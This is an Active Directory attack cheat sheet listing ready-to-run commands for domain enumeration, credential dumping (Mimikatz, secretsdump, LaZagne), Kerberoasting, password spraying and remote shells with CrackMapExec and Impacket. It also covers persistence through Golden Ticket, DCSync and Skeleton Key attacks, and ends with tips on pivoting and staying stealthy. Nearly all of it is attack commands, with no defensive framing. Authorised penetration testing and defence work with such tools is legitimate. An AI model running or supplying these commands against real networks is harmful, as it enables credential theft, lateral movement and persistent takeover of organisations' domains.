Active Directory Tool Cheat Sheet

Your quick-access toolkit for AD Enumeration, Exploitation, Lateral Movement, and Persistence

Table of Contents

1. Enumeration Tools
2. Credential Access & Extraction
3. Privilege Escalation
4. Lateral Movement
5. Persistence & Post-Exploitation
6. BloodHound Query Ideas

1. Enumeration Tools

BloodHound + SharpHound

Graph-based AD attack path discovery and visualization.

SharpHound.exe -c All

ADRecon

Comprehensive domain enumeration with a nice report format.

.\ADRecon.ps1

PowerView (PowerSploit)

PowerShell-based enumeration of users, groups, trusts, ACLs, etc.

Get-DomainUser
Get-DomainGroupMember -Identity "Domain Admins"
Get-NetDomainTrust

ldapsearch (Linux)

LDAP enumeration from Linux systems.

ldapsearch -x -h <DC-IP> -b "DC=domain,DC=local"

rpcclient & enum4linux-ng

Anonymous enumeration of users/groups.

rpcclient -U "" <IP>

enum4linux-ng <IP>

2. Credential Access & Extraction

Mimikatz

Extract passwords, hashes, tickets, and more from memory.

privilege::debug
sekurlsa::logonpasswords
lsadump::sam

LaZagne

Dump passwords from browsers, memory, and apps.

LaZagne.exe all

Impacket: secretsdump.py

Dump NTDS.dit remotely or hashes from SAM.

secretsdump.py 'domain/user:password@dc-ip'

Rubeus (Kerberoasting)

Rubeus.exe kerberoast

3. Privilege Escalation

Rubeus (TGT & Ticket Attacks)

Rubeus.exe asktgt /user:<username> /rc4:<ntlm>
Rubeus.exe dump

Seatbelt

System enumeration focused on privesc and situational awareness.

.\Seatbelt.exe all

Watson.exe

Privilege escalation checker for Windows.

Watson.exe

SharpHound

Identify privilege abuse paths like WriteDACL, GenericAll, etc.

SharpHound.exe -c ACL

4. Lateral Movement

CrackMapExec (CME)

Swiss Army knife for spraying, enumeration, command execution.

cme smb <IP> -u users.txt -p passwords.txt --shares

cme smb <IP> -u admin -p password --exec-method smbexec -x whoami

Impacket: wmiexec.py

Execute commands via WMI remotely.

wmiexec.py domain/user:password@target-ip

Impacket: psexec.py

Gain SYSTEM shell via SMB.

psexec.py domain/user:password@target-ip

Impacket: smbexec.py

More stealthy alternative to psexec.

smbexec.py domain/user:password@target-ip

Invoke-SMBExec (PowerShell-based)

Invoke-SMBExec -Target <IP> -Username <user> -Hash <ntlm>

5. Persistence & Post-Exploitation

DSInternals

Dump secrets and manipulate AD objects.

Test-PasswordQuality -SamAccountName "Administrator"

Golden Ticket (Mimikatz)

kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXXX /krbtgt:<hash>

DCSync Attack (Mimikatz)

lsadump::dcsync /domain:domain.local /user:krbtgt

Skeleton Key Attack

Injects a master password into LSASS for any domain account login.

Use Mimikatz or similar post-ex tools. Use with caution.

6. BloodHound Query Ideas

Suggested queries once BloodHound data is ingested:

• Shortest paths to Domain Admins
• Users with Kerberoastable services
• Computers with unconstrained delegation
• Accounts with GenericAll or WriteDACL on objects
• Shadow admin accounts
• Users with local admin rights across multiple hosts

Tips & Usage Flow

• Start light with built-in tools: net user, nltest, nslookup.
• Use proxychains with CME or BloodHound when pivoting.
• Prefer runas /netonly or Rubeus for alternate credentials.
• Keep enumeration and exploitation separate for stealth.